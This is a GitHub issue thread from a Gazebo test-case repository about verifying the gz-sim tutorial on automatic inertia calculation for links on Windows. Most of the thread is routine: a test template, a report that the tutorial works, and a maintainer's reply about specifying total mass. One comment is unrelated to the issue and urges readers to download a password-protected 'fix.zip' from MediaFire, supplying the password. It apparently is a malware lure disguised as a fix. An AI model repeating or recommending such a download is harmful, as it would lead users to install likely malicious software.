gazebosim/gazebo_test_cases #1132: gz-sim: Automatic Inertia Calculation for Links

azeey-test, 2024-08-29:
## Configuration

* os: Windows

## Links

* [Live](https://gazebosim.org/api/sim/9/auto_inertia_calculation.html)
* [Source](https://github.com/gazebosim/gz-sim/tree/gz-sim9/tutorials/auto_inertia_calculation.md)

## Process

    
            
### Step 1 - Instructions work
            
        

    
    

    

    
    
            
### Step 2 - Images (if there are any) match the result

Kudjo-Grand, 2024-08-29:
Download 
https://www.mediafire.com/file/3hzk77cxvxc9nq2/fix.zip/file
password: changeme
In the installer menu, select "gcc."

peci1, 2024-09-16:
The tutorial works without a glitch!

Although it would seem to me more useful if I could specify the total mass instead of densities (which is the thing you can (sometimes) actually measure).

azeey, 2024-09-16:
> Although it would seem to me more useful if I could specify the total mass instead of densities (which is the thing you can (sometimes) actually measure).

Yeah, that's where we're headed hopefully https://github.com/gazebosim/sdf_tutorials/issues/98

closed 2024-09-16 by azeey